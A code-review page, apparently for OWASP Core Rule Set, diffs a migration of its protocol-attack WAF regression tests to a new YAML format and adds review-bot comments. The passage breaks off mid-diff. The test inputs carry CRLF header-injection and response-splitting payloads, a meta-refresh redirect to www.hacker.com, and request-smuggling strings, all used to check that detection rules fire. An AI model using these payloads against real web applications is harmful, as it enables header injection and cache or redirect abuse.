data: "var=%0d%0aContent-Length: 0" - version: HTTP/1.1 - output: - log_contains: id "921120" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%0d%0aContent-Length: 0" + version: HTTP/1.1 + output: + log: + expect_ids: [921120] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml index 1bd49962f..57318cbb9 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml 
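Review bot: Test 4 POSTs `data: "var=%0d%0aContent-Length: 0"` without a `Content-Type` header, so whether the body is parsed into ARGS — and therefore whether `expect_ids: [921120]` actually exercises the rule on body data — depends on the test runner supplying a default content type, which I cannot confirm from this page. Adding `Content-Type: application/x-www-form-urlencoded` to that stage's `headers:` removes the dependency. The two 921110 POST stages shown above (`data: "var=budget foo)\n"` and `data: "var=get it\n"`) have the same omission. Tests 1–3 are GET-only and unaffected.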
@@ -1,77 +1,75 @@ --- meta: author: "csanders-git, Franziska Bühler, azurit" - description: None - enabled: true - name: 921130.yaml +rule_id: 921130 tests: - - test_title: 921130-1 + - test_id: 1 desc: HTTP response splitting (921130) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/?lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E" - version: "HTTP/1.1" - output: - log_contains: id "921130" - - test_title: 921130-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/?lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E" + version: "HTTP/1.1" + output: + log: + expect_ids: [921130] + - test_id: 2 desc: "HTTP Response splitting attack: cookie data" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cookie: "oreo=munchmuch%0d%0a%0d%0a" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "921130" - - test_title: 921130-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cookie: "oreo=munchmuch%0d%0a%0d%0a" + User-Agent: "OWASP CRS test agent" + 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [921130] + - test_id: 3 desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/1.2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2" - version: "HTTP/1.1" - output: - log_contains: id "921130" - - test_title: 921130-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2" + version: "HTTP/1.1" + output: + log: + expect_ids: [921130] + - test_id: 4 desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2" - version: "HTTP/1.1" - output: - log_contains: id "921130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2" + version: "HTTP/1.1" + output: + log: + expect_ids: [921130] 
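Review bot: Scalar quoting is inconsistent within the new side of this file: test 2 writes `Host: "localhost"` while tests 1, 3 and 4 write `Host: localhost`, and `Accept:` is quoted in tests 3 and 4 but plain in tests 1 and 2. Since the migration rewrites every stage anyway, this is the moment to pick one style; the plain forms are safe here (no value starts with an indicator or looks like a number or boolean), so either consistently unquoted or consistently quoted is fine. The `Keep-Alive: '300'` quoting in test 1 should stay as it is, because unquoted it would become an integer.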
diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml index 94f0d5fe7..224232ba5 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml 
@@ -1,41 +1,40 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
- enabled: true
- name: "921140.yaml"
 description: "Tests for protocol based attacks"
+rule_id: 921140
 tests:
- - test_title: 921140-1
+ - test_id: 1
 desc: "HTTP Header Injection Attack via headers"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- method: "GET"
- port: 80
- headers:
- Host: "localhost"
- SomeHeader: "Headerdata\rInjectedHeader: response_splitting_code"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- uri: "/"
- version: "HTTP/1.1"
- output:
- no_log_contains: "id:921140"
- - test_title: 921140-2
+ - input:
+ dest_addr: "127.0.0.1"
+ method: "GET"
+ port: 80
+ headers:
+ Host: "localhost"
+ SomeHeader: "Headerdata\rInjectedHeader: response_splitting_code"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ uri: "/"
+ version: "HTTP/1.1"
+ output:
+ log:
+ no_expect_ids: [921140]
+ - test_id: 2
 desc: "HTTP Header Injection Attack via headers"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- method: "GET"
- port: 80
- headers:
- Host: "localhost"
- SomeHeader: "Headerdata%0dInjectedHeader: response_splitting_code"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- uri: "/"
- version: "HTTP/1.1"
- output:
- no_log_contains: "id:921140"
+ - input:
+ dest_addr: "127.0.0.1"
+ method: "GET"
+ port: 80
+ headers:
+ Host: "localhost"
+ SomeHeader: "Headerdata%0dInjectedHeader: response_splitting_code"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ uri: "/"
+ version: "HTTP/1.1"
+ output:
+ log:
+ no_expect_ids: [921140]
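Review bot: The removed negative assertions used the colon form `no_log_contains: "id:921140"`, which does not match the `id "921140"` log form that the positive checks elsewhere in this commit look for (e.g. `log_contains: "id \"921150\""`), so both old tests passed regardless of whether the rule fired; the new `no_expect_ids: [921140]` is the first time these two cases genuinely assert that 921140 stays silent, and they should be confirmed green against both engines before merge rather than assumed to be a no-op migration. Independently, this file now contains only negative tests, so the rule's detection is never exercised; a `desc:` such as `desc: "Header with raw CR is rejected upstream before rules run; 921140 must not fire"` would at least document why both cases are expected to be quiet (the rejection-upstream reasoning is an inference — confirm).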
diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml index 54830c91d..9a57c4427 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml 
@@ -1,39 +1,38 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
- enabled: true
- name: "921150.yaml"
 description: "Tests for protocol based attacks"
+rule_id: 921150
 tests:
- - test_title: 921150-1
+ - test_id: 1
 desc: "HTTP Header Injection Attack via payload"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- method: "GET"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- uri: "/get/script.jsp?variableX=bar&variable2=Y&%0d%0restofdata"
- version: "HTTP/1.1"
- output:
- log_contains: "id \"921150\""
- - test_title: 921150-2
+ - input:
+ dest_addr: "127.0.0.1"
+ method: "GET"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ uri: "/get/script.jsp?variableX=bar&variable2=Y&%0d%0restofdata"
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [921150]
+ - test_id: 2
 desc: "Status Page Test - Header Injection Attack (CR/LF detected): Send a parameter name that includes %0d%0a (percent-encoded CR-LF)"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- port: 80
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: "*/*"
- method: GET
- uri: "/get?parameter%0d%0a=test"
- version: HTTP/1.0
- output:
- log_contains: id "921150"
+ - input:
+ dest_addr: 127.0.0.1
+ port: 80
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: "*/*"
+ method: GET
+ uri: "/get?parameter%0d%0a=test"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [921150]
diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml
index 189302946..5a9a5f0e6 100644
--- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml
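Review bot: Test 1's URI ends in `%0d%0restofdata`, where `%0r` is not a valid percent-escape, and the stage's `desc:` does not say whether that is deliberate; the 921160 file on this page labels the same `%0d%0R` pattern "invalid line break", so it probably is, but a reader of this file alone will read it as a typo for `%0d%0a`. Extending the description, e.g. `desc: "HTTP Header Injection Attack via payload (CR followed by malformed escape %0r, not CRLF)"`, pins the intent and stops the next maintainer from "fixing" it and silently changing what the test covers. The `Accept: "*/*"` quoting in test 2 is correct and must stay — unquoted, `*/*` would be parsed as a YAML alias.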
+++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml 
@@ -1,68 +1,67 @@ --- meta: author: "Paul Beckett, azurit" - enabled: true - name: "921151.yaml" description: "Tests to trigger or not trigger rule 921151" +rule_id: 921151 tests: - - test_title: 921151-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?941151-1=test%0Dnext=more" - version: "HTTP/1.1" - output: - log_contains: "id \"921151\"" - - test_title: 921151-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?941151-1=test%0Dnext=more" + version: "HTTP/1.1" + output: + log: + expect_ids: [921151] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?941151-2=test%0Anext=more" - version: "HTTP/1.1" - output: - log_contains: "id \"921151\"" - - test_title: 921151-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?941151-2=test%0Anext=more" + version: "HTTP/1.1" + output: + log: + expect_ids: [921151] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: 
"/get?941151-3=test%0A%0Dnext=more" - version: "HTTP/1.1" - output: - log_contains: "id \"921151\"" - - test_title: 921151-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?941151-3=test%0A%0Dnext=more" + version: "HTTP/1.1" + output: + log: + expect_ids: [921151] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: '941151-4=test\r\nmore=text' - version: "HTTP/1.1" - output: - no_log_contains: "id \"921151\"" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: '941151-4=test\r\nmore=text' + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921151] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml index e0dd6f982..49354a855 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml 
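Review bot: Test 4's body is written as `data: '941151-4=test\r\nmore=text'` in single quotes, where `\r` and `\n` are not escape sequences, so the request body carries the four literal characters backslash-r-backslash-n rather than a CR LF pair; the `no_expect_ids: [921151]` assertion is then satisfied trivially, not because the rule correctly ignores CRLF in POST data. If a real line break in the body was intended, the line should be `data: "941151-4=test\r\nmore=text"` (double quotes), and a `desc:` stating that 921151 inspects GET argument names only would explain why the POST case is negative — that scope statement is an inference from the other three tests and should be checked against the rule. Cosmetic but worth fixing in the same pass: the parameter names in all four tests are `941151-N` while the file tests rule 921151.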
@@ -1,103 +1,102 @@ --- meta: author: "Christian S.J. Peron, azurit" - enabled: true - name: "921160.yaml" description: "Tests for protocol based attacks" +rule_id: 921160 tests: - - test_title: 921160-1 + - test_id: 1 desc: "HTTP Header Injection Attack via payload: w/header, invalid line break, newlines after key" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0Remote-addr%0d%0d%0d:%20foo.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0Remote-addr%0d%0d%0d:%20foo.bar.com" + version: "HTTP/1.1" + output: + log: + expect_ids: [921160] + - test_id: 2 desc: "HTTP Header Injection Attack via payload: w/header, correct line break, newlines after key" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr%0d%0d%0d:%20foo.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: 
"/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr%0d%0d%0d:%20foo.bar.com" + version: "HTTP/1.1" + output: + log: + expect_ids: [921160] + - test_id: 3 desc: "HTTP Header Injection Attack via payload: w/header" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr:%20foo.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr:%20foo.bar.com" + version: "HTTP/1.1" + output: + log: + expect_ids: [921160] + - test_id: 4 desc: "HTTP Header Injection Attack via payload: w/header, attack explicitly in value rather than key" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&variable2=%0d%0aRemote-addr:%20foo.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/script_rule921160.jsp?variableX=bar&variable2=%0d%0aRemote-addr:%20foo.bar.com" + version: "HTTP/1.1" + output: + log: + expect_ids: [921160] 
+ - test_id: 5 desc: "HTTP Header Injection Attack via payload: w/header, attack explicitly in key rather than value" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&%0d%0aRemote-addr:%20foo.bar.com=Y" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/script_rule921160.jsp?variableX=bar&%0d%0aRemote-addr:%20foo.bar.com=Y" + version: "HTTP/1.1" + output: + log: + expect_ids: [921160] + - test_id: 6 desc: "Status Page Test - simple HTTP header Injection Attack via payload in value" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?foo=%0d%0arefresh:%20www.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?foo=%0d%0arefresh:%20www.bar.com" + version: "HTTP/1.1" + output: + log: + expect_ids: [921160] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml index a4c10816b..881e2d4d1 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml 
+++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml 
@@ -1,103 +1,101 @@ --- meta: author: "jptosso, azurit" - enabled: true - name: "921180.yaml" - description: "Tests to trigger, or not trigger 921170 and 921180" +rule_id: 921180 tests: - # Standard GET request - test_title: 921180-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza" - version: "HTTP/1.1" - output: - no_log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921180] - # Standard GET request - test_title: 921180-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza&pizza=pineapple" - version: "HTTP/1.1" - output: - no_log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza&pizza=pineapple" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921180] - # Standard GET request (Negative, no args) - test_title: 921180-3 + test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921180] - # HPP payload - test_title: 921180-4 + test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza&pineapple=aint-pizza" - version: "HTTP/1.1" - output: - log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza&pineapple=aint-pizza" + version: "HTTP/1.1" + output: + log: + expect_ids: [921180] - # Similar arg names - test_title: 921180-5 + test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza&pineapple2=aint-pizza" - version: "HTTP/1.1" - output: - no_log_contains: "id \"921180\"" - - # HPP payload with multiple iterations - test_title: 921180-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza&pineapple2=aint-pizza" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921180] + - test_id: 6 + desc: query parameter repetition stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza&pineapple=aint-pizza&pineapple=is-pizza&pineapple=aint-pizza2" - version: "HTTP/1.1" - output: - log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza&pineapple=aint-pizza&pineapple=is-pizza&pineapple=aint-pizza2" + version: "HTTP/1.1" + output: + log: + expect_ids: [921180] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml index b92fc6b0a..f8138f8a2 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml 
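Review bot: The per-test comments that documented this file (`# Standard GET request`, `# Standard GET request (Negative, no args)`, `# HPP payload`, `# Similar arg names`, `# HPP payload with multiple iterations`) are removed on the new side, and only test 6 received a replacement `desc: query parameter repetition`; tests 1–5 are now undocumented, which matters most for test 5, whose near-duplicate parameter name `pineapple2` is a deliberate false-positive guard. Carrying each comment over as a `desc:` on its `test_id` line — for example `desc: "Standard GET request, no args (negative)"` on test 3 and `desc: "Similar but distinct arg names must not trigger"` on test 5 — keeps the intent in a field the runner preserves, whereas comments are lost on any round-trip. The removed `meta.description` mentioned rule 921170 as well; if those tests live in another file, nothing is lost, otherwise that coverage note disappears with this hunk.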
@@ -2,66 +2,65 @@ meta: author: "Andrea Menin (theMiddle), azurit" description: "HTTP Splitting" - enabled: true - name: 921190.yaml +rule_id: 921190 tests: - - test_title: 921190-1 + - test_id: 1 desc: "New line char in request filename (1)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/foo%0Abar" - version: "HTTP/1.1" - output: - log_contains: id "921190" - - test_title: 921190-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/foo%0Abar" + version: "HTTP/1.1" + output: + log: + expect_ids: [921190] + - test_id: 2 desc: "New line char in request filename (2)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/foo%0abar" - version: "HTTP/1.1" - output: - log_contains: id "921190" - - test_title: 921190-3 + - input: + dest_addr: "127.0.0.1" + headers: + 